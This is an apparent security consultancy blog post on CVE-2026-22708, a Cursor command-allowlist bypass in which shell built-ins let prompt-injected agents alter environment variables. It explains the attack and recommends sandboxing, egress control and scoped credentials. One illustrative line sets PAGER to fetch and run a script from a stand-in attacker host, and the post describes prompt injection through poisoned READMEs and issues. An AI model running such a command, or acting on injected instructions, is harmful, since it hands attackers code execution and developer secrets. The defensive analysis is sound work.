AI Security

Cursor's Command Allowlist Failed Open (CVE-2026-22708): Why Agent Safe Mode Is the Wrong Trust Boundary

Dark cyberpunk illustration of a robotic hand reaching through a cracked gate in a glowing orange wall, with cyan command-line light leaking past it into the dark.

An AI coding agent running in "safe mode," with its command allowlist set to empty, could still be steered into running arbitrary code on the developer's machine. That is the practical result of CVE-2026-22708, a terminal-allowlist bypass in Cursor that Pillar Security disclosed and Cursor fixed in version 2.3. The allowlist was supposed to be the wall between an agent that proposes commands and an agent that executes them without asking. The wall had a gap wide enough to drive a reverse shell through.

This is bigger than one editor. As of mid-2026, OWASP maps prompt injection to six of the ten categories in its Top 10 for Agentic Applications, and 28 of the 53 agentic projects it tracks are coding agents. The exposure - an autonomous process holding a live shell, reading attacker-influenceable text, on a machine that can reach your source code and your credentials - is now the default shape of how a lot of software gets written.

Here is who needs to act and who does not. If your developers run an agentic coding tool - Cursor, Claude Code, GitHub Copilot agent mode, Windsurf - in any auto-run or "YOLO" setting that executes the model's shell commands without a human clicking approve, and that agent runs on a laptop or CI runner holding deploy keys, cloud tokens, or a live VPN, this is yours and it is current. If your team only uses the agent to draft code in chat and a person runs every command by hand, or you do not run agentic coders at all, file this under "know it exists" and move on. The danger lives in the auto-execution step, not in the model being clever.

What actually broke in Cursor

Cursor's allowlist validated external commands - the binaries on disk - against an approved set before the agent could run them. Shell built-ins never touched that check. Commands like export, unset, typeset, declare, readonly, and local run inside the shell process itself rather than as separate executables, so they ran without appearing in the allowlist and without prompting the user. Pillar's writeup states it directly: even when the allowlist is empty, environment variables can still be modified without asking the user for consent.

That is enough to win. A built-in that sets an environment variable changes how every later "trusted" command behaves. Point PAGER at an attacker command and the next innocent git log hands off control. Re-order PATH so a planted git binary resolves first. Chain Python's hooks - PYTHONWARNINGS, BROWSER, PERL5OPT - and a later script executes injected Perl. The researchers also showed a zero-approval path through zsh's evaluate-on-expansion behavior. The shape of the attack:

# Illustrative (CVE-2026-22708). 'export' is a shell built-in, so Cursor's
# allowlist check never sees it - no prompt, even with an empty allowlist.
export PAGER='sh -c "curl -s https://attacker.example/x | sh"'

# Later the agent runs a command everyone treats as safe:
git log          # git pipes its output through $PAGER -> attacker code runs

The delivery vector is indirect prompt injection. The attacker never types these commands; the model emits them after reading them out of something the agent was pointed at - a poisoned README, a dependency's post-install notes, a GitHub issue, a web page the agent fetched to "research" a task. SC Media described the outcome as stealthy remote code execution. Cursor's 2.3 release closes the specific hole by requiring explicit approval for any command its server-side parser cannot confidently classify.

Why an allowlist is the wrong control here

An allowlist works when the set of safe actions is closed and you can name every member. A shell is the opposite of closed. Built-ins, aliases, functions, environment variables, and word expansion give you an open-ended supply of ways to turn one approved command into a different action. You cannot enumerate that supply, which means any allow-by-name scheme for a shell fails open the first time someone finds the member you forgot to list.

Agentic tools sharpen the problem in a specific way: the attacker controls the input the model reasons over. A normal program runs the code its developer wrote. An agent runs the code a probabilistic model produces after reading text an attacker may have planted upstream. Simon Willison's "lethal trifecta" names the dangerous combination - access to private data, exposure to untrusted content, and a way to send data out - and a coding agent on a developer laptop usually has all three at once. The allowlist was refereeing a game whose rules the attacker gets to rewrite mid-play.

So the design question is the wrong one if you ask "which commands do I allow?" Ask instead "what can this process touch if the model is fully attacker-controlled?" Assume the agent will, at some point, run something you never intended. Then make that event boring.

The pattern is bigger than one bug

CVE-2026-22708 is one instance of a class. In March 2026 a backdoored build of LiteLLM, the gateway many agent frameworks route through, sat on PyPI for roughly three hours and was pulled down about 47,000 times before removal - every install handing an autonomous process to whoever planted it. In 2025 a coding assistant deleted a company's production database with no attacker involved at all, just an agent acting on its own confused plan. The throughline is that an autonomous agent with real reach turns ordinary mistakes and ordinary injection into production incidents. Treating each new editor CVE as a one-off patch misses that the category itself is the exposure.

Three controls that actually contain a coding agent

Containment, not classification, is what holds. Three controls, in priority order.

1. Run it in a sandbox with nothing of yours in it

Put the agent in a container or disposable VM whose filesystem holds only the repository it needs. No mounted home directory, no SSH keys, no ~/.aws, no kubeconfig. The Cursor researchers reached the same conclusion: give agents full command execution inside an isolated environment and stop pretending an allowlist can sort safe from unsafe. A minimal Docker profile to start from:

docker run --rm -it \
  --network none \                 # no outbound by default; open specific routes below
  --cap-drop ALL \                 # drop Linux capabilities
  --security-opt no-new-privileges \
  --read-only \                    # root filesystem read-only
  --tmpfs /tmp \
  -v "$PWD":/work:rw -w /work \    # only the repo is writable
  agent-sandbox:latest

2. Control egress, do not just hope for it

Exfiltration and second-stage download both need the network. Default the sandbox to no outbound, then allow only the registries the build genuinely needs - your package mirror, the language toolchain - through a proxy you log. When the agent reaches for an address that is not on that short list, you have a signal worth alerting on rather than a quiet beacon you find weeks later.

3. Give it ephemeral, least-privilege credentials

The agent should never hold a long-lived deploy key or a standing cloud admin token. Issue short-lived, scoped credentials for the single task and keep production access out of the blast radius entirely. Meta's "Agents Rule of Two" is a workable heuristic: of the three properties - acts on untrusted input, has access to sensitive systems, can change state or send data out - let an agent hold at most two without a human in the loop. A coding agent reading the open internet and holding your cloud keys has all three.

What to check before your next sprint

Concrete, in order of payoff:

  • Inventory auto-run. Find every developer who has turned on auto-run or auto-approve in Cursor, Claude Code, Copilot agent mode, or Windsurf. That setting, not the vendor name, is the risk you are managing.
  • Patch Cursor. Anything at or below 2.2 is exposed to CVE-2026-22708; move to 2.3 or later per the vendor advisory.
  • Get agents off privileged machines. An agent on the same laptop that holds a prod VPN session and your cloud credentials is the worst case. Move it into a sandbox before you tune anything else.
  • Scrub the environment. Secrets living in environment variables are readable by any command the agent runs. Pull them out of the agent's environment and inject them only into the human-approved steps that need them.
  • Watch the process tree. Log what runs under your agent. A coding assistant spawning curl, sh -c, or an outbound socket it has no business opening is worth a detection rule today.

Run the agent where it cannot reach your secrets

Banning these tools is the wrong call - they earn their keep, and they are not going back in the box. The job is to decide, on purpose, what an agent can touch when, not if, it runs something you never sanctioned. Patch Cursor today. Then take the harder step this quarter: stand up a sandboxed, egress-controlled, credential-starved place for these agents to run, so a poisoned README costs you a thrown-away container instead of your deploy keys. If you are rolling agents out across a team and want a second set of eyes on the blast radius before one of them reads the wrong file, that is a conversation worth having now.

Rolling out AI coding agents across your team?

We help teams put real guardrails around agentic AI - sandboxing, egress control, and credential scoping - so an autonomous agent cannot run code it should not against systems it should never reach. Book a session to map your exposure and right-size the controls.